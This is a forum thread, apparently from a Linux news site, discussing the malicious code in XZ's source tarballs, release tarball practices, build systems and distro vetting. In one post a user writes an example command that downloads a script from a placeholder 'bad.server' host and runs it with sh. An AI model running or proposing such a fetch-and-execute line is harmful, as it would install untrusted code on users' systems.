XZ Struck By Malicious Code That Could Allow Unauthorized Remote System Access

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts
  • tesfabpel
    Junior Member
    • Oct 2013
    • 17

    #11
    Originally posted by darkbasic View Post

    It's the *source* tarball which contains the final piece of the malicious code, not the binaries. It's no coincidence that starting from today Arch Linux switched to the git tag lol
    Probably it's the extra assets that are published in the release page on GitHub (the ones called differently than "Source Code (zip)" and "Source Code (tar.gz)") since the standard two are downloading from ".../archive/refs/tags/v5.6.1.{tar.gz,.zip}" instead of ".../releases/download/v5.6.1/xz-5.6.1.{tar.gz,.zip}".

    Probably the ones from "refs/tags" are built automatically by GitHub when downloading them (they don't even have the size visible in the page).


    immagine.png

    Comment

    • RealNC
      Senior Member
      • Jul 2008
      • 4247

      #12
      Why don't they use CI to create the release tarballs? Or do they? CI infra compromised then?

      Comment

      • bug77
        Senior Member
        • Dec 2009
        • 6526

        #13
        Originally posted by avis View Post
        Almost all distros, aside from maybe RHEL, rush to push upstream packages without ever verifying that the source code has not been tampered with.

        ...

        This is not an XZ issue. This is the issue of the entire Linux ecosystem. The issue of safety, security, trust and verifiability.
        The ecosystem is fine tyvm.

        "Almost all distros" do not rush to push the latest and greatest. Even rolling releases have unstable and testing repositories. Enterprise grade distributions are based on consumer facing counterparts that validate packages further. It's actually a very healthy setup. This was injected on Feb 24 and fixed a few days over a month later. That's pretty good in my book.

        Comment

        • Volta
          Senior Member
          • Apr 2019
          • 2310

          #14
          Originally posted by avis
          roliverio

          There have been zero instanced of Microsoft/Apple/Google distributing malware in their entire 30+ years history. If you're concerned about "telemetry" it's different. It doesn't allow these companies to fuck with your systems or gain unauthorized access like in this situation.
          Yeah fking right!

          Be careful the next time you download a game off the Microsoft Store on Windows, as there's dangerous malware hiding in clones of several popular games. Before you download anything, make sure it's the actual app and not a fake.

          According to the security research firm Check Point (via Bleeping Computer), there are clones of popular games like Temple Run and Subway Surfers appearing on the Microsoft Store that contain the Electron Bot malware.

          The malware is a backdoor that gives the attacker complete control over infected machines with the goal of social media promotion and click fraud through Facebook, Google, YouTube, and Sound Cloud.
          Good luck checking their code!

          Oh, so called 'telemetry' is a malware introduced by vendor himself.

          Comment

          • bug77
            Senior Member
            • Dec 2009
            • 6526

            #15
            Originally posted by avis
            roliverio

            Blacklisted immediately and goodbye. There have been zero instanced of Microsoft/Apple/Google distributing malware in their entire 30+ years history. If you're concerned about "telemetry" it's different. It doesn't allow these companies to fuck with your systems or gain unauthorized access like in this situation.
            You probably missed the days when developers were urging Microsoft to keep VB out of the Office suite. They didn't and created a prime vector for a whole new generation of malware that did not exist before.

            Comment

            • avis
              Senior Member
              • Dec 2022
              • 2274

              #16
              Originally posted by bug77 View Post

              You probably missed the days when developers were urging Microsoft to keep VB out of the Office suite. They didn't and created a prime vector for a whole new generation of malware that did not exist before.
              This is 100% unrelated and VB was a single toggle to switch/disable and not deal with possibly malicious macros, if you ever were concerned about this attack vector.

              That roliverio guy heavily implied and joked about MS/Apple/Google actually distributing malware (an interpreter is not malware cause otherwise a compiler in your distro is ALSO an attack vector and Python gets installed by default in pretty much in all distros) and I'm sad these companies won't sue him for libel.
              Last edited by avis; 29 March 2024, 01:35 PM.

              Comment

              • archkde
                Senior Member
                • May 2019
                • 702

                #17
                Originally posted by RealNC View Post
                Why don't they use CI to create the release tarballs? Or do they? CI infra compromised then?
                Now if they used a build system that doesn't require running random binaries distributed in the "source" tarball, this kind of "release tarballs" would not be needed at all.

                Comment

                • archkde
                  Senior Member
                  • May 2019
                  • 702

                  #18
                  Originally posted by uxmkt
                  You dense MF. They would have done the same, just with different syntax.
                  No, because with CMake you only run the source code, not random binaries.

                  Comment

                  • oibaf
                    Senior Member
                    • Feb 2008
                    • 1223

                    #19
                    All the details are here: https://lwn.net/ml/oss-security/2024...3.anarazel.de/

                    Comment

                    • avis
                      Senior Member
                      • Dec 2022
                      • 2274

                      #20
                      Originally posted by archkde View Post

                      No, because with CMake you only run the source code, not random binaries.
                      The build system is irrelevant. You can obfuscate whatever you want and run wget https://bad.server/script.sh && sh script.sh and do whatever you please.

                      All the code Linux distros include must be manually inspected (and run through automated systems as well, since people don't always catch/see everything) and verified for being safe, period.

                      Comment

                      Working...
                      X